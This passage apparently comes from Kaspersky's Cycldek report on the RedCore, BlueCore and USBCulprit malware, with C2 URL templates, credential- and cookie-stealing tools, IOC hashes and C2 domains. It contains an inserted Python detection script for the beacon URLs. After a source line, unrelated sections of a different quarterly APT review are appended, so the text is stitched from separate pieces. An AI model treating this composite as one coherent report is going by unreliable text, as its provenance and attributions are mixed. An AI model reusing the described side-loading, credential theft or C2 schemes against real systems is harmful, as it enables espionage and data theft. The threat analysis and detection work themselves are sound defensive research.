| Side-loaded DLL | QcLite.dll | wsc.dll |
| Payload loader | stdole.tlb: contains PE loading shellcode and an encrypted BlueCore binary | msgsm64.acm: contains PE loading shellcode and an encrypted RedCore binary |
| Injected process | dllhst3g.exe | explorer.exe or winlogon.exe |
| Configuration file | %APPDATA%\desktop.ini | C:\Documents and Settings\All Users\Documents\desktop.ini or C:\Documents and Settings\All Users\Documents\desktopWOW64.ini |
| Mutexes | UUID naming scheme, e.g. {986AFDE7-F299-4A7D-BBF4-CA756FC27208}, {CF94A87F-4B49-4751-8E5C-DA2D0A8DEC2F} | UUID naming scheme, e.g. {CB191C19-1D2D-45FC-9092-6DB462EFEAC6}, {F0062B9A-15F8-4D5F-9DE8-02F39EBF71FB}, {E68DFA68-1132-4A32-ADE2-8C87F282C457}, {728264DE-3701-419B-84A4-2AD86B0C43A3}, {2BCD5B61-288C-44D5-BA0D-AAA00E9D2273}, {D9AE3AB0-D123-4F38-A9BE-898C8D49A214} |
| Communicated URL scheme | http://%s:%d/link?url=%s&enpl=%s&encd=%s | http://%s:%d/search.jsp?referer=%s&kw=%s&psid=%s or http://%s:%d/search.jsp?url=%s&referer=%s&kw=%s&psid=%s |

_**Table 1: Comparison of BlueCore and RedCore loader and implant traits.**_

As demonstrated by the table, the variants share similar behavior. For example, both use DLL load order hijacking to run code from DLLs impersonating dependencies of legitimate AV utilities, and both share a mutex naming convention of random UUIDs, where mutexes are used for synchronization of thread execution.
By comparing code in both implants, we can find multiple functions that originate from the PcShare RAT; however, several others (like the injection code in the figure below) are proprietary and demonstrate identical code that may have been written by a shared developer.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122817/cycldek_bridging_02.png>)

**_Figure 2: Code similarity in proprietary injection code used in both RedCore and BlueCore implants. Code marked in yellow in BlueCore is an inlined version of the marked function in RedCore._**

Moreover, both implants leverage similar injected shellcode used to load the RedCore and BlueCore implants. This shellcode, which resides in the files 'stdole.tlb' and 'msgsm64.acm', contains a routine used to decrypt the implant's raw executable from an embedded blob, map it to memory and execute it from its entry point in a new thread. Since both pieces of shellcode are identical for the two variants and cannot be attributed to any open source project, we estimate that they originate from a proprietary shared resource.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122905/cycldek_bridging_03.png>)

**_Figure 3: Call flow graph comparison for binary decryption functions used by the shellcode in both clusters._**

Having said that, it is also evident that there are differences between the variants. The clearest distinctions can be made by looking at malware functionality that is unique to one type of implant and absent from the other. The following are examples of features that could be found only in RedCore implants, suggesting that despite their similarity with BlueCore, they were likely used by a different entity for different purposes:

 * _Keylogger_: RedCore records the title of the current foreground window (if it exists) and logs keystrokes every 10 ms to an internal buffer of 65530 bytes.
When this buffer is filled, its contents are written to a file named 'RCoRes64.dat'. The data is encoded with a single-byte XOR using the key 0xFA.
 * _Device enumerator_: RedCore registers a window class intended to intercept window messages, with a callback that checks whether the inspected message was sent as a result of a DBT_DEVICEARRIVAL event. Such events signal the connection of a device to the system, in which case the callback verifies that the device is a new volume and, if it is, sends a bitmap of the currently available logical drives to the C&C.
 * _RDP logger_: RedCore subscribes to an RDP connection event via ETW and notifies the C&C when it occurs. The code that handles this functionality is based on a little-known Github repository named [EventCop](<https://github.com/Mandar-Shinde/EventCop>) which is intended to obtain a list of users that connected to a system via RDP. The open-source code was modified so that instead of printing the data of the incoming connection, the malware contacts the C&C and informs it about the connection event.
 * _Proxy server_: RedCore spawns a server thread that listens on a pre-configured port (by default 49563) and accepts requests from non-localhost connections. A firewall exception is made for the process before the server starts running, and any subsequent requests passed from a source to it are validated and passed on to the C&C in their original format.

Perhaps the most notable difference between the two implants is the URL scheme they use to connect to and beacon their C&C servers. By looking for requests made using similar URL patterns in our telemetry, we were able to find multiple C&C servers and divide the underlying infrastructure between the aforementioned two clusters. The requests by each malware type were issued only by legitimate and signed applications that were either leveraged to side-load a malicious DLL or injected with malicious code.
All of the discovered domains were used to download further samples.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26122956/cycldek_bridging_04.png>)

**_Figure 4: Difference in URL scheme used by each implant for C2 communication._**

The conclusion that we were able to reach from this is that while all targets were diplomatic and government entities, each cluster of activity had a different geographical focus. The operators behind the BlueCore cluster invested most of their efforts on Vietnamese targets with several outliers in Laos and Thailand, while the operators of the RedCore cluster started out with a focus on Vietnam and diverted to Laos by the end of 2018. The statistics of these activities, based on the number of detected samples we witnessed downloaded from each cluster of C&Cs, are outlined in the figures below.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123040/cycldek_bridging_05.png>)

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123118/cycldek_bridging_06.png>)

_**Figure 5: Volume of downloaded samples from C&Cs of each cluster by country and month, since mid-2018.**_

Furthermore, considering both differences and similarities, we are able to conclude that the activities we saw are affiliated to a single actor, which we refer to as Cycldek. In several instances, we spotted unique tools crafted by the group that were downloaded from servers of both clusters. One example of this, which can be seen in the figure below, is a tool custom built by the group named USBCulprit. Two samples of it were downloaded from both BlueCore and RedCore servers. A more comprehensive list can be found in the Appendix.
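A detection-side companion to Table 1 and Figure 4, added here as an example and not taken from the report or from any Kaspersky tooling: it turns the two beacon URL templates into matchers and runs them over proxy log lines, cross-checking the requesting process against the side-loading hosts and injection targets the text names for each cluster, and then groups the contacted servers by cluster the way the report split the infrastructure. The log format, hostnames, addresses and query values are constructed for the demonstration.

```python
from urllib.parse import parse_qs, urlsplit

# Beacon templates from Table 1: request path plus the exact set of query keys.
# Matching on the key set rather than on order survives any reordering while
# still rejecting generic /search.jsp traffic.
BEACONS = {
    "BlueCore": [("/link", {"url", "enpl", "encd"})],
    "RedCore": [
        ("/search.jsp", {"referer", "kw", "psid"}),
        ("/search.jsp", {"url", "referer", "kw", "psid"}),
    ],
}

# Processes the report ties to each cluster: the signed side-loading hosts and
# the processes the implant injects into (lower-cased for comparison).
HOST_PROCESSES = {
    "BlueCore": {"qcconsol.exe", "dllhst3g.exe"},
    "RedCore": {"wsc_proxy.exe", "explorer.exe", "winlogon.exe"},
}


def classify_url(url):
    """Return 'BlueCore', 'RedCore' or None for a single request URL."""
    parts = urlsplit(url)
    keys = set(parse_qs(parts.query, keep_blank_values=True))
    for cluster, templates in BEACONS.items():
        if any(parts.path.lower() == path and keys == wanted for path, wanted in templates):
            return cluster
    return None


def triage_line(line):
    """Parse one proxy log line (constructed format: ts host process method url).

    Returns None for non-matching traffic; otherwise a finding naming the cluster,
    the C2 host and whether the requesting process is one the report associates
    with that cluster. A template hit from an unexpected process is still
    reported: it is the URL scheme that identifies the implant.
    """
    ts, host, process, _method, url = line.split(maxsplit=4)
    cluster = classify_url(url)
    if cluster is None:
        return None
    return {
        "timestamp": ts,
        "host": host,
        "process": process,
        "cluster": cluster,
        "c2": urlsplit(url).hostname,
        "process_matches": process.lower() in HOST_PROCESSES[cluster],
    }


def triage(lines):
    """Run triage_line over an iterable of log lines, skipping blanks."""
    findings = []
    for line in lines:
        if line.strip():
            finding = triage_line(line)
            if finding:
                findings.append(finding)
    return findings


def infrastructure_by_cluster(findings):
    """Group C2 hosts by cluster: the split the report used to separate the two infrastructures."""
    groups = {}
    for finding in findings:
        groups.setdefault(finding["cluster"], set()).add(finding["c2"])
    return groups


# Constructed sample log (not real telemetry). Addresses are from documentation
# ranges; the URL shapes follow Table 1.
SAMPLE_LOG = """\
2018-11-05T08:12:31Z WS-HANOI-07 QcConsol.exe GET http://203.0.113.10:8080/link?url=aHR0cDov&enpl=x1&encd=ZGF0YQ
2018-11-05T08:12:40Z WS-HANOI-07 chrome.exe GET https://www.example.com/search.jsp?kw=weather
2018-12-02T14:03:02Z WS-VTE-03 wsc_proxy.exe GET http://198.51.100.7:80/search.jsp?referer=a&kw=b&psid=c
2018-12-02T14:03:09Z WS-VTE-03 explorer.exe GET http://198.51.100.7:80/search.jsp?url=u&referer=a&kw=b&psid=c
2018-12-02T14:05:00Z WS-VTE-03 outlook.exe GET http://198.51.100.7:80/search.jsp?referer=a&kw=b&psid=c
"""

if __name__ == "__main__":
    found = triage(SAMPLE_LOG.splitlines())
    for f in found:
        flag = "" if f["process_matches"] else "  (process not in the report's list)"
        print(f"{f['timestamp']} {f['host']} {f['process']} -> {f['cluster']} C2 {f['c2']}{flag}")
    print(infrastructure_by_cluster(found))
```

The last sample line shows why the process check is advisory rather than a filter: the URL scheme alone marks the request as a RedCore beacon, and a host process outside the report's list means a side-loading target this write-up does not cover, not a false positive. Path and key-set matching also keep the rule cheap enough to run over a full proxy archive; pivoting on the resulting C2 set per cluster is exactly how the report separated the two infrastructures.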
All in all, this suggests the entities operating behind those clusters are sharing multiple resources, both code and infrastructure, and operating under a single organizational umbrella.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123202/cycldek_bridging_07.png>)

_**Figure 6: Examples of proprietary malware named USBCulprit downloaded from servers of both clusters. Further examples are provided in the Appendix.**_

## Info stealing and lateral movement toolset

During the analysis, we were able to observe a variety of tools downloaded from both BlueCore and RedCore implants used either for lateral movement in the compromised networks or for information stealing from infected nodes. There were several types of these tools: some were proprietary and formerly unseen in the wild; others were pieces of software copied from open-source post-exploitation frameworks, some of which were customized to complete specific tasks by the attackers.

As in the cases of RedCore and BlueCore, the downloaded tools were all invoked as side-loaded DLLs of legitimate signed applications. Such applications included AV components like wsc_proxy.exe (Avast remediation service), qcconsol.exe and mcvsshld.exe (McAfee components), as well as legitimate Microsoft and Google utilities like the resource compiler (rc.exe) and Google Update (googleupdate.exe). Running inside a signed, trusted host lets the tools bypass weak security mechanisms like application whitelisting keyed on the executable, run with whatever permissions the host process has, and complicate incident response, since process listings show only the legitimate parent.

As already mentioned, the bulk of these tools are common and widespread among attackers, sometimes referred to as living-off-the-land binaries, or LOLBins. Such tools can be part of open-source and legitimate software, abused to conduct malicious activities.
Examples include BrowserHistoryView (a Nirsoft utility to obtain browsing history from common browsers), ProcDump (a Sysinternals tool used to dump process memory, possibly to obtain passwords from running processes), Nbtscan (a command line utility intended to scan IP networks for NetBIOS information) and PsExec (a Sysinternals tool used to execute commands remotely in the network, typically used for lateral movement).

The rest of the tools were either developed fully by the attackers or made use of known tools that were customized to accommodate particular attack scenarios. The following are several notable examples:

 * **Custom HDoor:** an old tool providing full-featured backdoor capabilities like remote machine administration, information theft, lateral movement and the launch of DDoS attacks. Developed by a hacker known as Wicked Rose, it was popular in Chinese underground forums for a while and made its way into the APT world in the form of variants based on it. One example is the [Naikon APT](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf>), which made use of the original tool.
   The custom version used by Cycldek uses a small subset of the features, and the attackers used it to scan internal networks and create tunnels between compromised hosts in order to avoid network detections and bypass proxies. The tool allows the attackers to exfiltrate data from segregated hosts that are accessible through the local network but not connected to the internet.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123304/cycldek_bridging_08.png>)

**Figure 7: Command line usage of the custom HDoor tool.**

 * **JsonCookies**: proprietary tool that steals cookies from SQLite databases of Chromium-based browsers.
For this purpose, the sqlite3.dll library is downloaded from the C&C and used during execution to parse the database and generate a JSON file named 'FuckCookies.txt' containing the stolen cookie info. Entries in the file resemble this one:

```json
{
  "domain": ".google.com",
  "id": 1,
  "name": "NID",
  "path": "/",
  "value": "%VALUE%"
}
```

 * **ChromePass**: proprietary tool that steals saved passwords from Chromium-based browser databases. The output of the parsed database is an HTML document containing a table with URLs and their corresponding stolen username and password information. This program includes a descriptive command line message that explains how to use it, as outlined below.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123439/cycldek_bridging_09.png>)

**Figure 8: Command line usage of the ChromePass tool.**

## Formerly Unreported Malware: USBCulprit

One of the most notable examples in Cycldek's toolset that demonstrates both data stealing and lateral movement capabilities is a malware we discovered and dubbed USBCulprit. This tool, which we saw downloaded by RedCore implants in several instances, is capable of scanning various paths in victim machines, collecting documents with particular extensions and passing them on to USB drives when they are connected to the system. It can also selectively copy itself to a removable drive in the presence of a particular file, suggesting it can be spread laterally by having designated drives infected and the executable in them opened manually.

During the time the malware was active, it showed little change in functionality. Based on Kaspersky's telemetry, USBCulprit has been seen in the wild since 2014, with the latest samples emerging at the end of 2019. The most prominent addition incorporated into samples detected after 2017 is the capability to execute files with a given name from a connected USB.
This suggests that the malware can be extended with other modules. However, we were not able to capture any such files and their purpose remains unknown.

Another change we saw is the loading scheme used for variants spotted after 2017. The older versions made use of a dropper that wrote a configuration file to disk and extracted an embedded cabinet archive containing a legitimate binary and a malicious side-loaded DLL. This was improved in the newer versions, where an additional stage was added, such that the side-loaded DLL decrypts and loads a third file from the archive containing the malicious payload. As a result, the latter can be found in its decrypted form only in memory.

This loading scheme demonstrates that the actor behind it makes use of TTPs similar to those seen in the previously described implants attributed to Cycldek. For example, binaries mimicking AV components are leveraged for conducting DLL load-order hijacking. In this case, one of the files dropped from the cabinet archive, named 'wrapper.exe' (originally named 'PtUserSessionWrapper.exe' and belonging to Trend Micro), forces the execution of a malicious DLL named 'TmDbgLog.dll'. Also, the malware makes use of an encrypted blob that is decrypted using RC4 and executed using a custom PE loader. The full chain is depicted in the figure below.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123540/cycldek_bridging_10.png>)

**Figure 9: USBCulprit's loading flow, as observed in samples after 2017.**

Once USBCulprit is loaded into memory and executed, it operates in three phases:

 * **Bootstrap and data collection:** this stage prepares the environment for the malware's execution. Namely, it invokes two functions named 'CUSB::RegHideFileExt' and 'CUSB::RegHideFile' that modify registry keys to hide the extensions of files in Windows and ensure that hidden files are not shown to the user.
It also writes several files to disk and initializes a data structure with paths that are later used or searched by the malware. Additionally, the malware makes a single scan to collect the files it intends to steal, using a function named 'CUSB::USBFindFile'. They are sought by enumerating several predefined directories to locate documents with one of the following extensions: *.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that lists all paths targeted for theft within a directory, such that every checked directory has a corresponding list file.

   The chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.

   It is worth noting that the sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to hold a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000', corresponding to 01/06/2016 00:00:00.

 * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection are completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function.
If at least one is of type DRIVE_REMOVABLE, further actions are taken.

   When a USB is connected, the malware will verify whether stolen data should be exfiltrated to it, or whether it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' is searched for in the drive and, if not found, is created. This directory is used as the target path for copying files to the drive or as the source path for obtaining them from it.

   To understand which direction of file copy should take place, a special marker file named '1.txt' is searched for locally. If it exists, the malware expects to find the aforementioned '$Recyc1e.Bin' directory in the drive, holding previously stolen document archives, and attempts to copy it to the disk. Otherwise, the local archive files are copied from the disk to the same directory on the drive.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)

**Figure 10: USBCulprit's check for the 1.txt marker, indicating whether stolen files should be copied to the removable drive, or from it.**

 * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' is checked locally to decide whether lateral movement should be conducted or not. Only if this file exists is the malware's binary copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.

   Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them.
Examples of these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}. Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess, based on how they are handled, that they are used as extension modules or updated versions of the malware itself. The former is an archive that is extracted to a specific directory whose files are enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.

The characteristics of the malware give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of removable media alone as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help the attackers profile whether the machine on which the malware was executed is indeed part of a segregated network.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)

**Figure 11: Commands used to profile the network connectivity of the compromised host.**

Another explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around.
This, along with the very specific files that the malware seeks as executable extensions, which could not be found as artifacts elsewhere in our investigation, points to a human factor being required to assist deployment of the malware in victim networks.

## Conclusion

Cycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and the timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.

Furthermore, our analysis of the implants affiliated with the group gives an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. It is also worth noting that we observed multiple points where these entities didn't work in a well-coordinated manner, for example, infecting machines with the BlueCore implant when they were already infected with RedCore.

Lastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased – it has merely evolved and changed shape, in terms of malware and actors.
We continue to track the actor and report on its activity in our Threat Intelligence Portal.

For more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)

### Appendix - IOCs

_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.

**RedCore**:

 * A6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL)
 * 4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)

**BlueCore**:

 * 1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL)
 * 6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL)
 * 6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL)
 * 600E14E4B0035C6F0C6A344D87B6C27F - stdole.tlb (encrypted shellcode and implant)

**Lateral Movement and Info-Stealing Toolset:**

 * 1640EE7A414DFF996AF8265E0947DE36 - ChromePass
 * 1EA07468EBDFD3D9EEC59AC57A490701 - ChromePass
 * 07EE1B99660C8CD5207E128F44AA8CBC - JsonCookies
 * 809196A64CA4A32860D28760267A1A8B - Custom HDoor
 * 81660985276CF9B6D979753B6E581D34 - Custom HDoor
 * A44804C2767DCCD4902AAE30C36E62C0 - Custom HDoor

**USBCulprit:**

 * A9BCF983FE868A275F8D9D8F5DEFACF5 - USBCulprit Loader
 * C73B000313DCD2289F51B367F744DCD8 - USBCulprit Loader
 * 2FB731903BD12FF61E6F778FDF9926EE - USBCulprit Loader
 * 4A21F9B508DB19398AEE7FE4AE0AC380 - USBCulprit Loader
 * 6BE1362D722BA4224979DE91A2CD6242 - USBCulprit Loader
 * 7789055B0836A905D9AA68B1D4A50F09 - USBCulprit Loader
 * 782FF651F34C87448E4503B5444B6164 - USBCulprit Loader
 * 88CDD3CE6E5BAA49DC69DA664EDEE5C1 - USBCulprit Loader
 * A4AD564F8FE80E2EE52E643E449C487D - USBCulprit Loader
 * 3CA7BD71B30007FC30717290BB437152 - USBCulprit Payload
 * 58FE8DB0F7AE505346F6E4687D0AE233 - USBCulprit Payload
 * A02E2796E0BE9D84EE0D4B205673EC20 - USBCulprit Payload
 * D8DB9D6585D558BA2D28C33C6FC61874 - USBCulprit Payload
 * 2E522CE8104C0693288C997604AE0096 - USBCulprit Payload

**Toolset overlapping in both clusters:**

| Common Name | MD5 | Blue Cluster Domain | Red Cluster Domain | Description |
|---|---|---|---|---|
| chromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080 | http://news.trungtamwtoa.com:88 | ChromePass |
| goopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443<br>http://hcm.vietbaonam.com:443 | USBCulprit |
| | 2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080<br>http://tinmoi.thoitietdulich.com:443<br>http://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53<br>http://tinmoi.vieclamthemde.com | USBCulprit |
| qclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com<br>http://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL |
| silverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443<br>http://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53<br>http://info.coreders.com:8080 | Custom HDoor |

**C&Cs and Dropzones**:

 * http://web.laovoanew[.]com - Red Cluster
 * http://tinmoi.vieclamthemde[.]com - Red Cluster
 * http://kinhte.chototem[.]com - Red Cluster
 * http://news.trungtamwtoa[.]com - Red Cluster
 * http://mychau.dongnain[.]com - Red Cluster
 * http://hcm.vietbaonam[.]com - Red Cluster
 * http://login.thanhnienthegioi[.]com - Red Cluster
 * http://103.253.25.73 - Red Cluster
 * http://luan.conglyan[.]com - Red Cluster
 * http://toiyeuvn.dongaruou[.]com - Red Cluster
 * http://tintuc.daikynguyen21[.]com - Red Cluster
 * http://web.laomoodwin[.]com - Red Cluster
 * http://login.giaoxuchuson[.]com - Red Cluster
 * http://lat.conglyan[.]com - Red Cluster
 * http://thegioi.kinhtevanhoa[.]com - Red Cluster
 * http://laovoanew[.]com - Red Cluster
 * http://cdn.laokpl[.]com - Red Cluster
 * http://login.dangquanwatch[.]com - Blue Cluster
 * http://info.coreders[.]com - Blue Cluster
 * http://thanhnien.vietnannnet[.]com - Blue Cluster
 * http://login.diendanlichsu[.]com - Blue Cluster
 * http://login.vietnamfar[.]com - Blue Cluster
 * http://cophieu.dcsvnqvmn[.]com - Blue Cluster
 * http://nghiencuu.onetotechnologys[.]com - Blue Cluster
 * http://tinmoi.thoitietdulich[.]com - Blue Cluster
 * http://khinhte.chinhsech[.]com - Blue Cluster
 * http://images.webprogobest[.]com - Blue Cluster
 * http://web.hcmuafgh[.]com - Blue Cluster
 * http://news.cooodkord[.]com - Blue Cluster
 * http://24h.tinthethaoi[.]com - Blue Cluster
 * http://quocphong.ministop14[.]com - Blue Cluster
 * http://nhantai.xmeyeugh[.]com - Blue Cluster
 * http://thoitiet.yrindovn[.]com - Blue Cluster
 * http://hanghoa.trenduang[.]com - Blue Cluster

Source: "Cycldek: Bridging the (air) gap", Securelist blog, published 2020-06-03, https://securelist.com/cycldek-bridging-the-air-gap/97157/. Related CVEs: CVE-2012-0158, CVE-2017-11882, CVE-2018-0802. CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C).

## Targeted attacks and malware campaigns

### Mobile espionage targeting the Middle East

At the end of June we reported the details of a highly targeted campaign that we dubbed 'Operation ViceLeaker', involving the spread of malicious Android samples via instant messaging. The campaign affected several dozen victims in Israel and Iran. We discovered this activity in May 2018, right after Israeli security agencies announced that Hamas had installed spyware on the smartphones of Israeli soldiers, and we released a private report on our [Threat Intelligence Portal](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>). We believe the malware has been in development since late 2016, but the main distribution began at the end of 2017.
The attackers used two methods to install these implants: they backdoored legitimate apps, injecting malicious Smali code; and they built the open-source legitimate 'Conversations' messenger with the malicious code included. You can read more about Operation ViceLeaker [here](<https://securelist.com/fanning-the-flames-viceleaker-operation/90877/>).

### APT33 beefs up its toolset

In July, we published an update on the 2016-17 activities of [NewsBeef](<https://securelist.com/twas-the-night-before/91599/>) (aka APT33 and Charming Kitten), a threat actor that has focused on targets in Saudi Arabia and the West. NewsBeef lacks advanced offensive capabilities and has previously engaged in long-term, elaborate social engineering schemes that take advantage of popular social network platforms. In previous campaigns, this threat actor relied heavily on the Browser Exploitation Framework (BeEF). However, in the summer of 2016, the group deployed a new toolset that included macro-enabled Office documents, PowerSploit, and the Pupy backdoor. The most recent campaign uses this toolset in conjunction with [spear-phishing](<https://encyclopedia.kaspersky.com/glossary/spear-phishing/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) emails, links sent over social media and standalone private messaging applications, and [watering-hole](<https://encyclopedia.kaspersky.com/glossary/watering-hole/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) attacks that use compromised high-profile websites (some belonging to the Saudi government). The group has changed multiple characteristics year over year – tactics, the malicious JavaScript injection strategically placed on compromised websites, and command-and-control (C2) infrastructure.
Subscribers to our [private intelligence reports](<https://www.kaspersky.com/enterprise-security/apt-intelligence-reporting>) receive unique and extraordinary data on significant activity and campaigns of more than 1009 APTs from across the world, including NewsBeef.

### New FinSpy iOS and Android implants found in the wild

We recently reported on the [latest versions of FinSpy for Android and iOS](<https://securelist.com/new-finspy-ios-and-android-implants-revealed-itw/91685/>). Governments and law enforcement agencies across the world use this surveillance software to collect personal data. FinSpy implants for iOS and Android have almost identical functionality: they are able to collect personal information such as contacts, messages, emails, calendars, GPS location, photos, files in memory, phone call recordings and data from the most popular messengers. The Android implant includes functionality to gain root privileges by abusing known vulnerabilities. The iOS version doesn't provide infection exploits for its customers and so can only be installed on [jailbroken](<https://encyclopedia.kaspersky.com/glossary/jailbreak/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) devices – suggesting that physical access is required in order to install the implant. During our latest research we detected up-to-date versions of these implants in almost 20 countries, but we think the actual number of infections could be much higher.

### Turla revamps its toolset

Turla (aka Venomous Bear, Uroboros and Waterbug), a high-profile Russian-speaking threat actor with a known interest in cyber-espionage against government and diplomatic targets, has made significant changes to its toolset.
Most notably, the group has wrapped its notorious JavaScript KopiLuwak malware in a new dropper called Topinambour, a new .NET file that is being used by Turla to distribute and drop its JavaScript KopiLuwak through infected installation packages for legitimate software programs such as VPNs for circumventing internet censorship. Named by the malware authors, Topinambour is an alternative name for the Jerusalem artichoke. Some of the changes the threat actor has made are intended to help it evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. Further, the malware is almost completely 'fileless': the final stage of infection, an encrypted Trojan for remote administration, is embedded in the computer's registry for the malware to access when ready. The two KopiLuwak analogues – the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan – are used for cyber-espionage. We think the threat actor deploys these versions when the computers of the targets are protected with security software capable of detecting KopiLuwak. All three implants are able to fingerprint targets, gather information on system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots. You can read more [here](<https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/>).

### CloudAtlas uses new infection chain

[Cloud Atlas](<https://securelist.com/recent-cloud-atlas-activity/92016/>) (aka Inception) has a long history of cyber-espionage operations targeting industries and government bodies. We first reported on this group in 2014 and we have continued to track its activities. During the first half of this year, we identified campaigns focused on Russia, Central Asia and regions of Ukraine with ongoing military conflicts.
Cloud Atlas hasn't changed its TTPs (Tactics, Techniques and Procedures) since 2018 and continues to rely on existing tactics and malware to compromise high value targets. The threat actor's Windows intrusion set still uses spear-phishing emails to target its victims: these are crafted with Office documents that use malicious remote templates – whitelisted per victim – hosted on remote servers. Previously, Cloud Atlas dropped its 'validator' implant, named PowerShower, directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. In recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed in 2014.

### Dtrack banking malware discovered

In summer 2018, we discovered ATMDtrack, a piece of banking malware targeting banks in India. We used YARA and the Kaspersky Attribution Engine to try to uncover more information about this ATM malware; and we found more than 180 new malware samples of a spy tool that we now call Dtrack. All the Dtrack samples we initially found were dropped samples, as the real payload was encrypted with various droppers – we were able to find them because of the unique sequences shared by ATMDtrack and the Dtrack [memory dumps](<https://encyclopedia.kaspersky.com/glossary/dump/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>). Once we decrypted the final payload and used the Kaspersky Attribution Engine again, we saw similarities with the [DarkSeoul campaign](<https://unit42.paloaltonetworks.com/tdrop2-attacks-suggest-dark-seoul-attackers-return/>), dating back to 2013 and attributed to the Lazarus group. It seems that they reused part of their old code to attack the financial sector and research centers in India.
Our telemetry indicates that the latest Dtrack activity was detected at the beginning of September 2019. This is a good example of how proper YARA rules and a solid working attribution engine can help to uncover connections with established malware families. In this case, we were able to add another family to the Lazarus group's arsenal: ATMDtrack and Dtrack. You can find our public report on Dtrack [here](<https://securelist.com/my-name-is-dtrack/93338/>).

## Other security news

### Sodin ransomware attacks MSP

